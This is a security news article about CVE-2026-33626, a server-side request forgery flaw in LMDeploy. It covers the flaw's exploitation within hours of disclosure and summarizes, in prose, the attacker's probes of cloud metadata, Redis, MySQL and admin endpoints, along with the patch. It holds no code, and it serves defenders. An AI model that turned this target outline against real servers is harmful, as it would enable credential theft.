A critical security lapse in AI infrastructure has once again highlighted how quickly threat actors can weaponize newly disclosed vulnerabilities, raising concerns across the cybertech ecosystem. A newly disclosed LMDeploy vulnerability tracked as CVE-2026-33626 was exploited in the wild just 12 hours and 31 minutes after its public advisory was released on GitHub. The flaw, identified as a server side request forgery issue, affects LMDeploy, a toolkit developed by the Shanghai AI Laboratory under its InternLM project. The platform is widely used for serving large language models and vision language systems through an OpenAI compatible API.

The vulnerability was disclosed on April 21, 2026, through advisory GHSA-6w67-hwm5-92mq and impacts versions prior to 0.12.3. At the core of the issue is a flawed implementation of the load image function, which allows arbitrary URLs to be fetched without validating hostnames, IP ranges, or request schemes. This oversight enables attackers to force the model server to make unauthorized HTTP requests to internal systems, cloud metadata services, and other restricted endpoints.

According to findings from the Sysdig Threat Research Team, the first exploitation attempt occurred at 03:35 UTC on April 22, originating from an IP address based in Kowloon Bay, Hong Kong. Notably, this attack was observed even before any public proof of concept exploit code became widely available, underscoring how adversaries are increasingly capable of translating vulnerability disclosures directly into actionable exploits.

The attack activity revealed a structured and deliberate approach. Initial probes targeted the AWS Instance Metadata Service at 169.254.169.254, aiming to extract IAM credentials. The attacker then scanned local services including Redis on port 6379 and MySQL on port 3306, along with potential administrative interfaces running on ports 80 and 8080. To confirm blind SSRF behavior, the attacker used an external callback domain, a common technique for validating outbound connectivity in modern exploitation scenarios.

Beyond simple reconnaissance, the attacker also attempted to interact with an unauthenticated administrative endpoint within LMDeploy’s distributed serving architecture. This indicates a deeper understanding of the platform’s internal design and suggests the potential for disrupting model inference processes or enabling lateral movement within AI infrastructure environments.

Security experts have rated CVE-2026-33626 as high severity with a CVSS score of 7.5, affecting all LMDeploy versions prior to 0.12.3. The patched release introduces stricter URL validation controls to block access to link local, loopback, and private network ranges, effectively closing the primary exploitation vector.

The rapid exploitation of this LMDeploy vulnerability underscores a broader industry shift, where traditional patch cycles are no longer sufficient to counter fast moving threats targeting AI serving environments. As organizations continue to deploy large language models and inference systems at scale, the need for real time threat detection, rapid patching, and stricter network controls is becoming increasingly urgent. This incident serves as a clear reminder that AI infrastructure is now a prime target, and securing it requires the same rigor applied to core enterprise systems.

Recommended Cyber Technology News :

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com